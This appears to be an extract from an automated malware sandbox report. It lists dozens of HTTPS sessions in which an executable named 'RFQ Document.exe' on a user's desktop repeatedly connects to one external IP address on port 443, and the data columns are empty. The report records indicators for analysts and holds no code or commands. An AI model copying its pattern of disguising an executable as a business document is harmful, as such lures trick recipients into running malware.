                                            133192.168.2.449932149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            134192.168.2.449933149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            135192.168.2.449934149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            136192.168.2.449935149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            137192.168.2.449936149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            138192.168.2.449937149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            139192.168.2.449938149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            14192.168.2.449788149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            140192.168.2.449939149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            141192.168.2.449940149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            142192.168.2.449941149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            143192.168.2.449942149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            144192.168.2.449943149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            145192.168.2.449944149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            146192.168.2.449948149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            147192.168.2.449950149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            148192.168.2.449951149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            149192.168.2.449953149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            15192.168.2.449789149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            150192.168.2.449956149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            151192.168.2.449958149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            152192.168.2.449960149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            153192.168.2.449962149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            154192.168.2.449964149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            155192.168.2.449965149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            156192.168.2.449967149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            157192.168.2.449968149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            158192.168.2.449970149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            159192.168.2.449972149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            16192.168.2.449790149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            160192.168.2.449974149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            161192.168.2.449975149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            162192.168.2.449977149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            163192.168.2.449978149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            164192.168.2.449979149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            165192.168.2.449980149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            166192.168.2.449981149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            167192.168.2.449982149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            168192.168.2.449983149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            169192.168.2.449984149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            17192.168.2.449791149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            170192.168.2.449988149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            171192.168.2.449991149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            172192.168.2.449992149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            173192.168.2.449993149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            174192.168.2.449994149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            175192.168.2.449996149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            176192.168.2.449997149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            177192.168.2.449998149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            178192.168.2.449999149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            179192.168.2.450000149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            18192.168.2.449792149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            180192.168.2.450001149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            181192.168.2.450002149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            182192.168.2.450003149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            183192.168.2.450004149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            184192.168.2.450005149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            185192.168.2.450006149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            186192.168.2.450007149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            187192.168.2.450008149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            188192.168.2.450009149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            189192.168.2.450010149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            19192.168.2.449793149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            190192.168.2.450011149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            191192.168.2.450012149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            192192.168.2.450013149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            193192.168.2.450014149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            194192.168.2.450015149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            195192.168.2.450016149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            196192.168.2.450017149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            197192.168.2.450018149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            198192.168.2.450019149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            199192.168.2.450020149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.449776149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            20192.168.2.449794149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            200192.168.2.450021149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            201192.168.2.450022149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            202192.168.2.450023149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            203192.168.2.450024149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            204192.168.2.450025149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            205192.168.2.450026149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            206192.168.2.450027149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            207192.168.2.450028149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            208192.168.2.450029149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            209192.168.2.450030149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            21192.168.2.449795149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            210192.168.2.450031149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            211192.168.2.450032149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            212192.168.2.450033149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            213192.168.2.450034149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            214192.168.2.450035149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            215192.168.2.450036149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            216192.168.2.450037149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            217192.168.2.450038149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            218192.168.2.450039149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            219192.168.2.450040149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            22192.168.2.449796149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            220192.168.2.450041149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            221192.168.2.450042149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            222192.168.2.450043149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            223192.168.2.450044149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            224192.168.2.450045149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            225192.168.2.450046149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            226192.168.2.450047149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            227192.168.2.450048149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            228192.168.2.450049149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            229192.168.2.450050149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            23192.168.2.449797149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            230192.168.2.450051149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            231192.168.2.450052149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            232192.168.2.450053149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            233192.168.2.450054149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            234192.168.2.450055149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            235192.168.2.450056149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            236192.168.2.450057149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            237192.168.2.450058149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            238192.168.2.450059149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            239192.168.2.450060149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            24192.168.2.449798149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            240192.168.2.450061149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            241192.168.2.450062149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            242192.168.2.450063149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            243192.168.2.450065149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            244192.168.2.450066149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            245192.168.2.450067149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            246192.168.2.450068149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            247192.168.2.450070149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            248192.168.2.450072149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            249192.168.2.450073149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            25192.168.2.449799149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            250192.168.2.450076149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            251192.168.2.450078149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            252192.168.2.450080149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            253192.168.2.450082149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            254192.168.2.450084149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            255192.168.2.450087149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            256192.168.2.450089149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            257192.168.2.450091149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            258192.168.2.450093149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            259192.168.2.450094149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            26192.168.2.449800149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            260192.168.2.450097149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            261192.168.2.450098149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            262192.168.2.450099149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            263192.168.2.450100149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            264192.168.2.450101149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            265192.168.2.450102149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            266192.168.2.450103149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            267192.168.2.450104149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            268192.168.2.450105149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            269192.168.2.450106149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            27192.168.2.449801149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            270192.168.2.450107149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            271192.168.2.450108149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            272192.168.2.450109149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            273192.168.2.450110149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            274192.168.2.450111149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            275192.168.2.450112149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            276192.168.2.450113149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            277192.168.2.450114149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            278192.168.2.450115149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            279192.168.2.450116149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            28192.168.2.449802149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
